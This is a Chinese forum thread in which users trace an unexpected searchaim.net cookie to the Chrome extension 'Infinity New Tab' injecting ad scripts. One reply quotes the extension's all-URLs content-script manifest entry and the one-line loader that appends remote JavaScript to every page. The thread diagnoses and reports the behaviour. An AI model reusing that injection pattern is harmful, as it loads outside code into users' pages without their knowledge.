› High Performance Web Sites
› Google Hacks: Tips & Tools for Finding and Using the World's Information
关于 Google SEO 最好的一本书
如题。用 Ghost 搭建的网站,没有登录, chrome 发现 cookie 有 1 个。
打开看看,来自一个域名 searchaim.net 。但是我印象中貌似从未见过这个网站,页面上应该也没有引用这个 js 。
如下图:
这是被插的 js :
网站已启用 HTTPS ,重定向所有 HTTP ,启用 HSTS , ssllabs A+
坐标湘潭,运营商电信。系统是 OS X 10.11.3
刚刚在 Ubuntu 虚拟机上测试了,没有被加这个 JS ,但是 OS X 下有
求教……
已解决,发现是Infinity 新标签页这个扩展以所谓的开发需要支持为由肆意插入广告。
该扩展已被我删除并举报。
 |
1
chemzqm Feb 16, 2016
你先在远程机器上 curl 下那个页面,排除被劫持的可能。
不过很可能是你用的某个主题的 js 加的,话说 ghost 的 makrdown 功能特别弱,大部分 gfm 扩展都没有,改起来比 wordpress 还要麻烦,因为要重启服务。 |
 |
2
fourstring OP @chemzqm 感谢回复。
由于 ubuntu 虚拟机下没有被插广告,我就在 OS X 上开了隐身,也没有广告,证实是扩展引起的。 然后我在 HTML 里找到了一个 iframe ,默认 display : none ,删除后发现这是一个开发者的话,说什么插件正在开发,需要我们的广告支持。 我一个个把扩展关掉再打开,发现插广告的是“ Infinity 新标签页”这个插件…… 个人对这种行为特别反感,即使插件开发需要支持,也没有权力在用户浏览页面上肆意插入广告,这和流氓无异。 Ghost 的 markdown 的确不怎么地,不过它还支持 gfm 的代码,算是个可以庆幸的事了…… |
 |
3
hxsf Feb 16, 2016
刚刚我也发现了,居然有人跟我一样。。。。
我是自己在写东西,调试的时候忽然发现 dom 里多了一堆 script 。。。 已经证实是由 Infinity New Tab 2.5.6.0 版加入 之前版本( 2.5.5.0 )没有 通过 chrome 扩展的接口在所有页面插入 myscript.js ``` "content_scripts": [ { "js": [ "js/myscript.js" ], "matches": [ "*://*/*" ] } ], ``` 内容为 ```js var script=document.createElement("script");script.async=!0,script.src="//searchaim.net/ca93d58f43.js",document.getElementsByTagName("body")[0].appendChild(script); ``` 剩下的其它 script 和 iframe 都通过 ca93d58f43.js 插进来的 这种被插入 js ,我都直接去~/Library/Application\ Support/Google/Chrome/Default/Extensions 里搜,一搜一个准。。。 最后,同举报 |
|
4
hxsf Feb 16, 2016
14 年见过这个玩意的作者发帖说自己做的无广告
然而现在。。。只能呵呵了。。。 |
|
5
fourstring OP @hxsf 在今天事件爆发之后,作者迅速又更新了 2.5.7 ,刚刚我下下来看了,已经把广告给去了
然并卵,这种态度,无论如何也不会再用 |
|
6
hxsf Feb 16, 2016
@fourstring 是的
|
 |
7
stackboom Feb 17, 2016
发现 @yangguang31466 在 v2 上发过贴,不知道是不是原作者。 Infinity 云备份挺好用的。。哎~
|
|
8
fourstring OP @stackboom 这个人貌似是作者
|
Select Language